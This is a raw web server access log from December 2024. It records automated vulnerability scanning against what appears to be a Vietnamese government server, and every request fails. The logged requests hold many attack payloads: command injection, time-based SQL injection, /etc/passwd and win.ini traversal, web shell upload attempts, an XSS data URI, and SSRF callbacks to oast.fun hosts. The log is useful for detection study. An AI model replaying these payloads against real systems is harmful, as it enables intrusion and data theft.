206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 55 2024-12-12 15:33:18 103.153.214.94 POST /wp-admin/admin-ajax.php action=action_name 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:104.0)+Gecko/20100101+Firefox/104.0 - 404 7 0 32 2024-12-12 15:33:21 103.153.214.94 GET /home/kontumWORDPRESS.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 42 2024-12-12 15:33:21 103.153.214.94 GET /common/config.php.new - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 43 2024-12-12 15:33:21 103.153.214.94 GET /config.php.zip - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:68.0)+Gecko/20100101+Firefox/68.0 - 404 7 0 45 2024-12-12 15:33:21 103.153.214.94 GET /config.php.new - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:86.0)+Gecko/20100101+Firefox/86.0 - 404 7 0 32 2024-12-12 15:33:21 103.153.214.94 GET /wp-config.php.bk - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/93.0.4577.0+Safari/537.36 - 404 7 0 36 2024-12-12 15:33:21 103.153.214.94 GET /config.php.tar.gz - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 38 2024-12-12 15:33:21 103.153.214.94 GET /home/kontum-WORDPRESS.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Whale/3.26.244.21+Safari/537.36 - 404 7 0 60 2024-12-12 15:33:33 103.153.214.94 POST /opencms/cmisatom/cmis-online/query - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 210 2024-12-12 15:33:36 103.153.214.94 POST /cmisatom/cmis-online/query - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 https://bcvt.kontum.gov.vn:8172 404 7 0 221 2024-12-12 15:33:52 103.153.214.94 POST /app/sys1.php - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.14;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 204 2024-12-12 15:34:04 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.1+Safari/605.1.15 - 404 7 0 38 2024-12-12 15:34:39 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 47 2024-12-12 15:34:42 103.153.214.94 POST /cgi-bin/vitogate.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/18.0+Mobile/15E148+Safari/604.1 - 404 7 0 225 2024-12-12 15:35:21 103.153.214.94 GET /wp-content/plugins/import-xml-feed/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/119.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 15:36:01 103.153.214.94 GET /api/server/version - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 225 2024-12-12 15:36:04 103.153.214.94 POST /api/users - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/116.0 - 404 7 0 221 2024-12-12 15:36:10 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 196 2024-12-12 15:36:26 103.153.214.94 POST /modules/ndk_steppingpack/search-result.php - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 202 2024-12-12 15:37:11 103.153.214.94 DELETE /app/rest/users/id:1/tokens/RPC2 - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/58.0.3029.110+Safari/537.3 - 400 0 0 230 2024-12-12 15:37:12 103.153.214.94 POST /app/rest/users/id:1/tokens/RPC2 - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.2.17 - 400 0 0 220 2024-12-12 15:37:27 103.153.214.94 GET /wp-content/plugins/knews/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 35 2024-12-12 15:39:16 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:120.0)+Gecko/20100101+Firefox/120.0 - 404 7 0 204 2024-12-12 15:39:48 103.153.214.94 GET /wp-content/plugins/nextgen-gallery/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/124.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 15:40:44 103.153.214.94 POST /wp-content/plugins/gallery-plugin/upload/php.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/25.0.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 62 2024-12-12 15:40:48 103.153.214.94 GET /wp-content/plugins/gallery-plugin/upload/files/mnijj.png - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 61 2024-12-12 15:41:11 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 32 2024-12-12 15:43:04 103.153.214.94 GET /wp-content/plugins/media-library-assistant/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 201 2024-12-12 15:43:07 103.153.214.94 GET /wp-content/plugins/media-library-assistant/includes/mla-stream-image.php mla_stream_file=ftp://ctd67t3bclspkptm3qo0chdyek8c91e3k.oast.fun/patrowl.svg 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2.1+Safari/605.7.15 - 404 7 0 203 2024-12-12 15:43:43 103.153.214.94 POST /wp-content/plugins/simple-file-list/ee-upload-engine.php - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 44 2024-12-12 15:43:48 103.153.214.94 POST /wp-content/plugins/simple-file-list/ee-file-engine.php - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 62 2024-12-12 15:43:54 103.153.214.94 GET /wp-content/uploads/simple-file-list/chebiia.php - 8172 - 206.238.196.225 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 41 2024-12-12 15:44:17 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14_4_1)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 39 2024-12-12 15:44:36 103.153.214.94 GET /wp-admin/admin-post.php swp_debug=load_options&swp_url=<pre>system('cat 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/115.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 15:44:41 103.153.214.94 GET /wp-content/plugins/slideshow-jquery-image-gallery/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 44 2024-12-12 15:44:44 103.153.214.94 GET /wp-content/plugins/securimage-wp/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 48 2024-12-12 15:46:39 103.153.214.94 GET / - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_13_4)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/11.1+Safari/605.1.15 - 404 7 0 63 2024-12-12 15:47:40 103.153.214.94 GET /chaosblade cmd=$(id) 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+rv:88.0)+Gecko/20100101+Firefox/88.0 - 404 7 0 218 2024-12-12 15:48:29 103.153.214.94 POST /tplus/ajaxpro/Ufida.T.SM.UIP.MultiCompanyController,Ufida.T.SM.UIP.ashx method=CheckMutex 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/94.0.4606.71+Safari/537.36 - 404 7 0 59 2024-12-12 15:48:53 103.153.214.94 GET /wp-content/plugins/smart-manager-for-wp-e-commerce/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/56.0.2924.87+Safari/537.36 - 404 7 0 37 2024-12-12 15:48:56 103.153.214.94 POST /wp-content/plugins/smart-manager-for-wp-e-commerce/sm/woo-json.php - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/617.18+(KHTML,+like+Gecko)+Version/17.4+Safari/617.18 - 404 7 0 43 2024-12-12 15:49:13 103.153.214.94 GET /html/ad/adpesquisasql/request/processVariavel.php gridValoresPopHidden=echo%20system("ipconfig"); 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+LoiLoNote/25.0.1+Version/17.4.1+Safari/605.1.15 - 404 7 0 221 2024-12-12 15:49:47 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 209 2024-12-12 15:49:50 103.153.214.94 GET /cgi-bin/cstecgi.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 227 2024-12-12 15:50:27 103.153.214.94 POST /tplus/ajaxpro/Ufida.T.SM.Login.UIP.LoginManager,Ufida.T.SM.Login.UIP.ashx method=CheckPassword 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.15-620 - 404 7 0 42 2024-12-12 15:50:40 103.153.214.94 GET /wp-content/plugins/wp-statistics/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:98.0)+Gecko/20100101+Firefox/98.0 - 404 7 0 37 2024-12-12 15:50:51 103.153.214.94 GET /wp-content/plugins/under-construction-maintenance-mode/readme.txt - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 37 2024-12-12 15:50:55 103.153.214.94 POST /webtools/control/xmlrpc;/ USERNAME&PASSWORD=s&requirePasswordChange=Y 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 218 2024-12-12 15:52:20 103.153.214.94 GET /tutor/filter searched_word&searched_tution_class_type[]=1&price_min=(SELECT(0)FROM(SELECT(SLEEP(7)))a)&price_max=9&searched_price_type[]=hourly&searched_duration[]=0 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 229 2024-12-12 15:52:35 103.153.214.94 GET /user/login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.1 - 404 7 0 204 2024-12-12 15:52:37 103.153.214.94 GET /user/login/ - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/79.0.3945.130+Safari/537.36 - 404 7 0 206 2024-12-12 15:53:39 103.153.214.94 POST /Proxy - 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 65 2024-12-12 15:53:45 103.153.214.94 POST /GNRemote.dll GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.1.21 - 404 7 0 55 2024-12-12 15:53:49 103.153.214.94 POST /GNRemote.dll GNFunction=LoginServer&decorator=text_wrap&frombrowser=esl 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.21+(KHTML,+like+Gecko)+Version/17.0+Safari/616.21 - 404 7 0 32 2024-12-12 15:53:59 103.153.214.94 GET /service/~baseapp/UploadServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1+Safari/605.2.22 - 404 7 0 33 2024-12-12 15:54:29 103.153.214.94 POST /CFIDE/wizards/common/utils.cfc method=wizardHash%20inPassword=bar%20_cfclient=true 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 223 2024-12-12 15:54:32 103.153.214.94 POST /CFIDE/wizards/common/utils.cfc method=wizardHash%20inPassword=bar%20_cfclient=true 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_6_8)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/28.0.1500.44+Safari/537.36 - 404 7 0 224 2024-12-12 15:54:36 103.153.214.94 POST /CFIDE/wizards/common/utils.cfc method=wizardHash%20inPassword=bar%20_cfclient=true 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14)+AppleWebKit/616.21+(KHTML,+like+Gecko)+Version/17.0+Safari/616.21 - 404 7 0 269 2024-12-12 15:54:39 103.153.214.94 POST /CFIDE/wizards/common/utils.cfc method=wizardHash%20inPassword=bar%20_cfclient=true 8172 - 156.251.25.152 Mozilla/5.0+\(Windows+NT+10.0\;+Win64\;+x64\)+AppleWebKit/537.36+\(KHTML,+like+Gecko\)+Chrome/100.0.4896.60+Safari/537.36 - 404 7 0 211 2024-12-12 15:54:47 103.153.214.94 GET /dview8/api/usersByLevel - 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 231 2024-12-12 15:54:48 103.153.214.94 GET /api/v1/system/system-information - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.9.16 - 404 7 0 213 2024-12-12 15:54:51 103.153.214.94 GET /api/v1/cav/admin/options - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 231 2024-12-12 15:54:51 103.153.214.94 POST /tplus/SM/SetupAccount/Upload.aspx preload=1 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 15:54:56 103.153.214.94 GET /tplus/img/login/2q3kZAe4V6OndnD9vHEuzfu2J9u.jpg - 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 33 2024-12-12 15:56:21 103.153.214.94 POST /partymgr/control/getJSONuiLabel - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 210 2024-12-12 15:56:21 103.153.214.94 POST /partymgr/control/getJSONuiLabel - 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 212 2024-12-12 15:56:21 103.153.214.94 POST /partymgr/control/getJSONuiLabelArray - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 208 2024-12-12 15:56:21 103.153.214.94 POST /partymgr/control/getJSONuiLabelArray - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.19 - 404 7 0 197 2024-12-12 15:57:31 103.153.214.94 POST /UploadFileData action=upload_file&filename=../2q3kZ8iuXm19Xlc3tsASqBxYCXf.jsp 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/118.0 - 404 7 0 40 2024-12-12 15:57:35 103.153.214.94 GET /R9iPortal/2q3kZ8iuXm19Xlc3tsASqBxYCXf.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 59 2024-12-12 15:58:03 103.153.214.94 POST /ajax/getemaildata.php DontCheckLogin=1&filePath=c:/windows/win.ini 8172 - 206.238.196.225 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/129.0.0.0+Safari/537.36 - 404 7 0 34 2024-12-12 15:58:03 103.153.214.94 GET /config/fillbacksettingedit.php DontCheckLogin=1&action=edit&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+ 8172 - 206.238.196.225 Mozilla/5.0+(CentOS;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 54 2024-12-12 15:58:04 103.153.214.94 GET /config/fillbacksetting.php DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 31 2024-12-12 15:58:04 103.153.214.94 GET /login.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/43.0.2357.124+Safari/537.36 - 404 7 0 32 2024-12-12 15:58:09 103.153.214.94 GET /ebvp/infopub/show_download_content;.js id=1';WAITFOR+DELAY+'0:0:6'-- 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 32 2024-12-12 15:58:10 103.153.214.94 GET /Export_Log /etc/passwd 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 36 2024-12-12 15:58:16 103.153.214.94 POST /servlet/FileReceiveServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/67.0.3396.99+Safari/537.36 - 404 7 0 32 2024-12-12 15:58:18 103.153.214.94 POST /webtools/control/ProgramExport;/ USERNAME&PASSWORD&requirePasswordChange=Y 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.5+Safari/605.8.17 - 404 7 0 235 2024-12-12 15:58:21 103.153.214.94 GET /BANQA.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(X11;+Linux+x86_64;+rv:109.0)+Gecko/20100101+Firefox/117.0 - 404 7 0 32 2024-12-12 15:58:39 103.153.214.94 POST /ztp/cgi-bin/handler - 8172 - 206.238.196.225 Mozilla/5.0+(Fedora;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 33 2024-12-12 15:59:14 103.153.214.94 POST /aim/equipmap/accept.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:95.0)+Gecko/20100101+Firefox/95.0 - 404 7 0 41 2024-12-12 15:59:17 103.153.214.94 GET /2q3kZ98X8zdikfV9O4BvYIrmmah.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3.1+Safari/605.1.15 - 404 7 0 31 2024-12-12 15:59:21 103.153.214.94 POST /plugins/ueditor/php/controller.php action=catchimage&upfolder=1 8172 - 206.238.196.225 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 55 2024-12-12 15:59:38 103.153.214.94 POST /cgi-bin/vitogate.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+WOW64;+rv:41.0)+Gecko/20100101+Firefox/128.0+(x64+de) - 404 7 0 197 2024-12-12 15:59:38 103.153.214.94 POST /cgi-bin/vitogate.cgi - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:103.0)+Gecko/20100101+Firefox/103.0 - 404 7 0 204 2024-12-12 16:00:29 103.153.214.94 POST /ajax/getemaildata.php DontCheckLogin=1 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/45.0.2454.93+Safari/537.36 - 404 7 0 33 2024-12-12 16:00:32 103.153.214.94 POST /ServiceDispatcherServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0+Safari/605.7.18 - 404 7 0 31 2024-12-12 16:00:33 103.153.214.94 GET /ncupload/n2d19a.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(ZZ;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 48 2024-12-12 16:00:47 103.153.214.94 POST /uapim/upload/grouptemplet groupid=36&fileType=jsp 8172 - 206.238.196.225 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.1.2+Safari/605.1.15 - 404 7 0 68 2024-12-12 16:00:50 103.153.214.94 GET /uapim/static/pages/36/head.jsp - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML++like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 60 2024-12-12 16:01:11 103.153.214.94 POST /servlet/~baseapp/nc.message.bs.NCMessageServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Debian;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 55 2024-12-12 16:01:15 103.153.214.94 POST /servlet/~baseapp/nc.message.bs.NCMessageServlet - 8172 - 206.238.196.225 Mozilla/5.0+(Windows+NT+10.0;+rv:78.0)+Gecko/20100101+Firefox/78.0 - 404 7 0 36 2024-12-12 16:01:37 103.153.214.94 GET /api/cors/data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+# - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:89.0)+Gecko/20100101+Firefox/89.0 - 400 0 0 215 2024-12-12 16:01:39 103.153.214.94 GET /api/cors/http:/nextchat.ctd67t3bclspkptm3qo0tm11x7i91n68a.oast.fun# - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+i686;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 400 0 0 208 2024-12-12 16:02:08 103.153.214.94 POST /upload - 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 201 2024-12-12 16:03:26 103.153.214.94 POST /api/authentication/login - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/112.0.0.0+Safari/537.36 https://bcvt.kontum.gov.vn:8172 404 7 0 204 2024-12-12 16:05:45 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 224 2024-12-12 16:06:16 103.153.214.94 GET /nagiosxi/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/122.0.0.0+Safari/537.36 - 404 7 0 201 2024-12-12 16:06:20 103.153.214.94 POST /nagiosxi/login.php - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/120.0.0.0+Safari/537.36 - 404 7 0 205 2024-12-12 16:06:21 103.153.214.94 GET /wp-content/plugins/wp-fastest-cache/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 255 2024-12-12 16:06:25 103.153.214.94 GET /nagiosxi/index.php/admin/banner_message-ajaxhelper.php action=acknowledge_banner_message&id=(SELECT+CASE+WHEN+1=1+THEN+sleep(5)+ELSE+sleep(0)+END+) 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 7 0 257 2024-12-12 16:08:36 103.153.214.94 GET /wp-content/plugins/my-calendar/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 199 2024-12-12 16:09:23 103.153.214.94 GET /api/clusters - 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 204 2024-12-12 16:09:52 103.153.214.94 GET /nodes view=summary 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/114.0.0.0+Safari/537.36 - 404 7 0 203 2024-12-12 16:10:02 103.153.214.94 GET /wp-content/plugins/backup-backup/readme.txt - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10.13;+rv:109.0)+Gecko/20100101+Firefox/115.0 - 404 7 0 202 2024-12-12 16:11:08 103.153.214.94 GET 